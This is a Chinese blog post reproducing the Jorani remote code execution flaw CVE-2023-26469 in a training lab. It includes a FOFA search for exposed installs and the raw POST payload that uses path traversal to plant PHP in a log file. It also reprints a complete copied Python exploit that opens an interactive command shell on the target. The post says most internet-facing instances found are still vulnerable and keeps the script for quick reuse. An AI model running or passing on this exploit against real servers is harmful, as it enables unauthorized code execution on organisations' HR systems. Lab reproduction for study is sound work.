Jorani远程命令执行漏洞 CVE-2023-26469

本文最后更新于 2024年11月10日 晚上

前言:最近比较浮躁,刷了一会玄机之后也不想打比赛,来春秋云镜复现看看cve吧

靶标介绍

Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。

影响范围

Jorani < 1.0.2

信息收集

fofa

title=”Jorani”

看了一下在能搜到的国外站里大部分都还是在影响范围内的

复现

先进行访问/session/login获取两个cookie值,csrf_cookie_joranijorani_session

2024-11-10152704

构造payload进行rce操作,改post发包

1
csrf_test_jorani=032db15b98aa9338f9cea39fff128d04&last_page=session/login&language=../../application/logs&login=<?=`$_GET[cmd]`?>&CipheredValue=test

进行url编码

1
csrf_test_jorani=032db15b98aa9338f9cea39fff128d04&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<%3f%3d`$_GET[cmd]`%3f>&CipheredValue=test

2024-11-10161110

最后构造执行rce

2024-11-10161106

1
/pages/view/log-2024-11-10?cmd=cat+/flag

log的后面日期取决于实际操作的时间,http头需要加上

1
X-REQUESTED-WITH: XMLHttpRequest

查了一下加上这个可能主要目的是增强 前后端交

exp脚本

网上直接找到,方便以后梭哈

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
"""
vulnerability covered by CVE-2023-26469
"""
import readline
import requests
import datetime
import sys
import re
import base64
import random
import string

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

msg = lambda x, y="\n": print(f'\x1b[92m[+]\x1b[0m {x}', end=y)
err = lambda x, y="\n": print(f'\x1b[91m[x]\x1b[0m {x}', end=y)
log = lambda x, y="\n": print(f'\x1b[93m[?]\x1b[0m {x}', end=y)

CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')
CMD_PATTERN = re.compile('---------(.*?)---------', re.S)

URLS = {
'login': '/session/login',
'view': '/pages/view/',
}

alphabet = string.ascii_uppercase
HEADER_NAME = ''.join(random.choice(alphabet) for i in range(12))

BypassRedirect = {
'X-REQUESTED-WITH': 'XMLHttpRequest',
HEADER_NAME: ""
}

INPUT = "\x1b[92mjrjgjk\x1b[0m@\x1b[41mjorani\x1b[0m(PSEUDO-TERM)\n$ " # The input used for the pseudo term

u = lambda x, y: x + URLS[y]

POISON_PAYLOAD = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>"
PATH_TRAV_PAYLOAD = "../../application/logs"

if __name__ == '__main__':
print("""
/!\\ Do not use this if you are not authorized to /!\\
""")
log("POC made by @jrjgjk (Guilhem RIOUX)", "\n\n")

if len(sys.argv) == 1:
err(f"Usage: {sys.argv[0]} <url>")
exit(0)

log(f"Header used for exploit: {HEADER_NAME}")

t = sys.argv[1]

s = requests.Session()
log("Requesting session cookie")
res = s.get(u(t, "login"), verify=False)

C = s.cookies.get_dict()

Date = datetime.date.today()
log_file_name = f"log-{Date.year}-{str(Date.month).zfill(2)}-{str(Date.day).zfill(2)}"

csrf_token = re.findall(CSRF_PATTERN, res.text)[0]
log(f"Poisoning log file with payload: '{POISON_PAYLOAD}'")
log(f"Set path traversal to '{PATH_TRAV_PAYLOAD}'")
msg(f"Recovered CSRF Token: {csrf_token}")

data = {
"csrf_test_jorani": csrf_token,
"last_page": "session/login",
"language": PATH_TRAV_PAYLOAD,
"login": POISON_PAYLOAD,
"CipheredValue": "DummyPassword"
}

s.post(u(t, "login"), data=data)

log(f"Accessing log file: {log_file_name}")

exp_page = t + URLS['view'] + log_file_name

### Shell
cmd = ""
while True:
cmd = input(INPUT)
if cmd in ['x', 'exit', 'quit']:
break
elif cmd == "":
continue
else:
BypassRedirect[HEADER_NAME] = base64.b64encode(b"echo ---------;" + cmd.encode() + b" 2>&1;echo ---------;")
res = s.get(exp_page, headers=BypassRedirect)
cmdRes = re.findall(CMD_PATTERN, res.text)
try:
print(cmdRes[0])
except:
print(res.text)
err("Wow, there was a problem, are you sure of the URL ??")
err('exiting..')
exit(0)

放一个靶场的利用结果

2024-11-10163912


Jorani远程命令执行漏洞 CVE-2023-26469
https://0ran9ewww.github.io/2024/11/10/cve复现/Jorani远程命令执行漏洞 CVE-2023-26469/
作者
orange
发布于
2024年11月10日
许可协议